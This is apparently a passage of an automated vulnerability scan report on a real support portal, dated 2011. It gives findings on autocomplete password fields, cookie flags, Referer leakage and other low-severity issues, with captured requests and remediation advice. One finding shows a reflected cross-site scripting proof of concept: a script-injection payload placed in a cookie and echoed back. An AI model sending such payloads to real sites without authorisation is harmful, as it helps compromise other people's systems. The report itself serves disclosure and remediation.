The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Main/Default.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:25:41 GMT
Content-Length: 21875


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form name="aspnetForm" method="post" action="Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

3.5. http://portal.smartertools.com/Main/frmNewTicket.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /Main/frmNewTicket.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Main/frmNewTicket.aspx?InstanceID=6f604a5b-0b9f-4e14-888e-8101c32f2a99 HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; ASP.NET_SessionId=be50u4iwall2tqwy1zlcdpv4; __utma=61502381.1558309378.1300551951.1300554580.1300557309.3; __utmc=61502381; __utmb=61502381.1.10.1300557309

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 17:55:00 GMT
Content-Length: 13463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form name="aspnetForm" method="post" action="frmNewTicket.aspx?InstanceID=6f604a5b-0b9f-4e14-888e-8101c32f2a99" id="aspnetForm">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

3.6. http://portal.smartertools.com/Main/frmNewTicket.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /Main/frmNewTicket.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Main/frmNewTicket.aspx?InstanceID=82323b12-758c-41d2-a388-cbaf396f28d1 HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:25:43 GMT
Content-Length: 13463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form name="aspnetForm" method="post" action="frmNewTicket.aspx?InstanceID=82323b12-758c-41d2-a388-cbaf396f28d1" id="aspnetForm">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

3.7. http://portal.smartertools.com/News/231/smartermail-804086-released.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /News/231/smartermail-804086-released.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /News/231/smartermail-804086-released.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://portal.smartertools.com/Main/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915; __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61502381.1558309378.1300551951.1300551951.1300551951.1; __utmc=61502381; __utmb=61502381.2.10.1300551951

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: uidut=6488571; expires=Tue, 19-Mar-2041 16:27:02 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:27:01 GMT
Content-Length: 15639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

3.8. http://portal.smartertools.com/News/news.aspx  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /News/news.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /News/news.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; ASP.NET_SessionId=be50u4iwall2tqwy1zlcdpv4; __utma=61502381.1558309378.1300551951.1300554580.1300557309.3; __utmc=61502381; __utmb=61502381.3.10.1300557309

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 17:55:03 GMT
Content-Length: 21211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

4. Cross-site scripting (reflected)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /ST.ashx

Issue detail

The value of the siteuidut cookie is copied into the HTML document as plain text between tags. The payload d710b<script>alert(1)</script>470bff92247 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /ST.ashx?scriptonly=true HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://portal.smartertools.com/Main/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942bd710b<script>alert(1)</script>470bff92247; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:26:29 GMT
Content-Length: 33118

this.STVisitorValue = "1dad4e31be764ea7b431d43fbac2942bd710b<script>alert(1)</script>470bff92247";this.STCallbackInterval = 8000;this.STHandlerFile = "ST.ashx";this.STStopCallbackAfterMs = 900000;this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.STTimeoutID = 0;
this.STPo
...[SNIP]...

5. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /App_Themes/Default/Javascript/JavaScript.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /App_Themes/Default/Javascript/JavaScript.ashx?guid=1CBE4CDC6819200_1.6.4093.19896_&fileMask= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: portal.smartertools.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/javascript
Expires: Sun, 18 Mar 2012 17:05:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 17:05:15 GMT
Content-Length: 98347

/*Ajax.js*/

var oldCallback = self.WebForm_DoCallback;
WebForm_DoCallback = function (eventTarget, eventArgument, eventCallback, context, errorCallback, useAsync) {
var action = $("form").att
...[SNIP]...
</div><a target=\"_blank\" href="http://maps.google.com/maps?q=' + encodeURIComponent(newLink) + '">' + language.GoogleMaps + '</a>
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /ST.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /ST.ashx?scriptonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: portal.smartertools.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: siteuidut=eb2f12d7ecfb4fe9b762df5864d6742d; expires=Tue, 19-Mar-2041 16:27:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:27:08 GMT
Content-Length: 33077

this.STVisitorValue = "eb2f12d7ecfb4fe9b762df5864d6742d";this.STCallbackInterval = 8000;this.STHandlerFile = "ST.ashx";this.STStopCallbackAfterMs = 900000;this.STLastCallbackImageHeight = 0;
this.STL
...[SNIP]...

7. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /News/231/smartermail-804086-released.aspx

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /News/231/smartermail-804086-released.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://portal.smartertools.com/Main/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915; __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61502381.1558309378.1300551951.1300551951.1300551951.1; __utmc=61502381; __utmb=61502381.2.10.1300551951

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: uidut=6488571; expires=Tue, 19-Mar-2041 16:27:02 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:27:01 GMT
Content-Length: 15639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<a href="mailto:sales@smartertools.com">sales@smartertools.com</a>
...[SNIP]...

8. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /ChatScript.ashx

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: portal.smartertools.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 17 Mar 2011 18:04:36 GMT
Accept-Ranges: bytes
ETag: "09281c6cde4cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:25:09 GMT
Connection: close
Content-Length: 809

User-agent: *
Disallow: /WebResource.axd
Disallow: /ScriptResource.axd
Disallow: /About/Checkup.aspx
Disallow: /About/frmCheckup.aspx
Disallow: /Agent/
Disallow: /App_Data/
Disallow: /App_Theme
...[SNIP]...

9. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://portal.smartertools.com
Path:   /Login.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

POST /Login.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache,no-cache
Content-Type: application/x-www-form-urlencoded
Host: portal.smartertools.com
Cookie: AspxAutoDetectCookieSupport=1
Accept-Encoding: gzip, deflate
Content-Length: 1072

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7cctl00%24BPH%24btnEnterClick&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwULLTEzNDc0MDg1OTUPFgYeCF9fX1Rpd
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=asxvee35t3dfzulgk2yacvbp; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 17:05:21 GMT
Content-Length: 5715

1|#||4|3713|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPa
...[SNIP]...

Report generated by XSS.CX at Sat Mar 19 15:00:09 CDT 2011.